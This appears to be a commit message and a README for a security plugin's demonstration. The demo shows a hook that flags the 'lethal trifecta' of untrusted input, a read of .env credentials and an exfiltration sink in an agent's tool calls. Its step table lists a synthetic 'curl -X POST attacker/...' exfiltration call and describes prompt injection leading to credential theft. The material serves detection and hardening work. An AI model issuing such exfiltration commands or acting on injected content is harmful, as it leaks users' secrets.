Companion to 8df5d5c (which only carried the doc updates — the example
directories themselves were left out of staging by mistake). This
commit adds the actual example mappes:
- examples/lethal-trifecta-walkthrough/{README.md, run-trifecta.mjs,
expected-findings.md}
- examples/mcp-rug-pull/{README.md, run-rug-pull.mjs,
expected-findings.md}
Plus plugin CLAUDE.md "Examples (runnable demonstrations)" section
with a 4-row table covering malicious-skill-demo, prompt-injection-
showcase, lethal-trifecta-walkthrough, and mcp-rug-pull plus the
state-isolation discipline notes.
Marketplace root README unchanged since plugin's outward coverage
is unchanged ([skip-docs] covers the marketplace-level gate).
104 lines
4.4 KiB
Markdown
104 lines
4.4 KiB
Markdown
# Lethal Trifecta Walkthrough
|
|
|
|
> **WARNING: This is a security demonstration fixture, NOT a real attack.**
|
|
> All payloads are synthetic. No external network is contacted, no real
|
|
> file is read, no real command is executed. The script only feeds JSON
|
|
> payloads to one of llm-security's hook scripts.
|
|
|
|
## What this demonstrates
|
|
|
|
The **Rule of Two** (Meta, Oct 2025): an agent must never simultaneously
|
|
hold all three of:
|
|
|
|
1. **Untrusted input** — content the model didn't author (web pages, MCP
|
|
output, document uploads, prompt injection surface)
|
|
2. **Sensitive data access** — files like `.env`, `.ssh/`, `.aws/`,
|
|
credential stores
|
|
3. **Exfiltration sink** — a path off the box (HTTP POST, scp, paste sites)
|
|
|
|
Any two are acceptable. All three at once is the **lethal trifecta**
|
|
(Simon Willison / Invariant Labs framing) — at that point, prompt
|
|
injection becomes credential theft.
|
|
|
|
`post-session-guard.mjs` (PostToolUse hook on every tool) tracks tool
|
|
calls in a 20-call sliding window and emits a SECURITY ADVISORY when all
|
|
three classes appear. This walkthrough shows it firing on a 5-step
|
|
sequence.
|
|
|
|
## Sequence
|
|
|
|
| # | Tool | Class | Advisory? |
|
|
|---|------|-------|-----------|
|
|
| 1 | WebFetch | input_source | no — only one class |
|
|
| 2 | Read `/path/.env` | data_access (sensitive) | no — only two classes |
|
|
| 3 | Bash `curl -X POST attacker/...` | exfil_sink | **YES — trifecta closes** |
|
|
| 4 | Bash `ls -la` | neutral | no — already warned in window |
|
|
| 5 | Bash `curl -X POST attacker/...` | exfil_sink | no — suppressed |
|
|
|
|
The advisory at step 3 lists the evidence and recommends remediations
|
|
(disable HTTP exfil, gate sensitive-path reads, narrow tool surface).
|
|
Step 4-5 are present to show suppression: `post-session-guard` writes a
|
|
warning marker into the state file so the operator isn't spammed by the
|
|
same trifecta repeating within the window.
|
|
|
|
## How to run
|
|
|
|
```bash
|
|
cd plugins/llm-security
|
|
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs
|
|
|
|
# Detailed output (full advisory text + stderr)
|
|
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs --verbose
|
|
```
|
|
|
|
Expected: `5 pass, 0 fail` and a `SECURITY ADVISORY (session-guard)`
|
|
preview after step 3.
|
|
|
|
## Hooks / scanners involved
|
|
|
|
- **`hooks/scripts/post-session-guard.mjs`** — the only hook invoked.
|
|
Configurable via `policy.json` `trifecta.mode` (`block` / `warn` /
|
|
`off`; default `warn`) or env var `LLM_SECURITY_TRIFECTA_MODE`.
|
|
|
|
This example uses `mode: warn` (default). In `block` mode the third
|
|
call's advisory becomes a hard block (exit 2) and the agent action is
|
|
denied — see `docs/security-hardening-guide.md` §3 for when to switch.
|
|
|
|
## OWASP / framework mapping
|
|
|
|
| Code | Framework | Why |
|
|
|------|-----------|-----|
|
|
| LLM01 | OWASP LLM Top 10 (2025) | Prompt injection lands via the input_source leg |
|
|
| LLM02 | OWASP LLM Top 10 (2025) | Sensitive output disclosure (the .env exfil) |
|
|
| ASI01 | OWASP Agentic Top 10 | Excessive Agency — agent holds all three capabilities |
|
|
| ASI02 | OWASP Agentic Top 10 | Agent Data Leakage — exfil sink + sensitive read |
|
|
|
|
## State isolation
|
|
|
|
`post-session-guard` stores per-session state at
|
|
`${os.tmpdir()}/llm-security-session-${ppid}.jsonl`. Because all five
|
|
hook invocations are spawned by the same `run-trifecta.mjs` process,
|
|
they share that script's PID as their parent PID — so the entire
|
|
walkthrough lives in a single state file. The script deletes the file
|
|
in a `finally` block before exiting. **Your real session state under
|
|
`/tmp/` is never touched.**
|
|
|
|
## Limitations
|
|
|
|
- The walkthrough demonstrates the *primary* 20-call sliding-window
|
|
trifecta. It does not exercise the 100-call slow-burn variant
|
|
(`SLOW_BURN_MIN_SPREAD = 50`), the MCP-concentrated variant
|
|
(all three legs from the same MCP server), behavioral drift via
|
|
Jensen-Shannon divergence, or volume-threshold advisories.
|
|
Those have their own unit tests under `tests/lib/post-session-guard.*`.
|
|
- This is deterministic detection. It does not exercise the
|
|
`block`-mode exit-2 path — flip `LLM_SECURITY_TRIFECTA_MODE=block`
|
|
and re-run if you want to see the script fail at step 3.
|
|
|
|
## See also
|
|
|
|
- `docs/security-hardening-guide.md` §3 — Rule of Two and configuration
|
|
- `knowledge/owasp-agentic-top10.md` — ASI01 / ASI02 background
|
|
- `knowledge/deepmind-agent-traps.md` — adjacent attack categories
|
|
- `examples/prompt-injection-showcase/` — the input_source leg in isolation
|
|
- `expected-findings.md` (in this folder) — the testable contract
|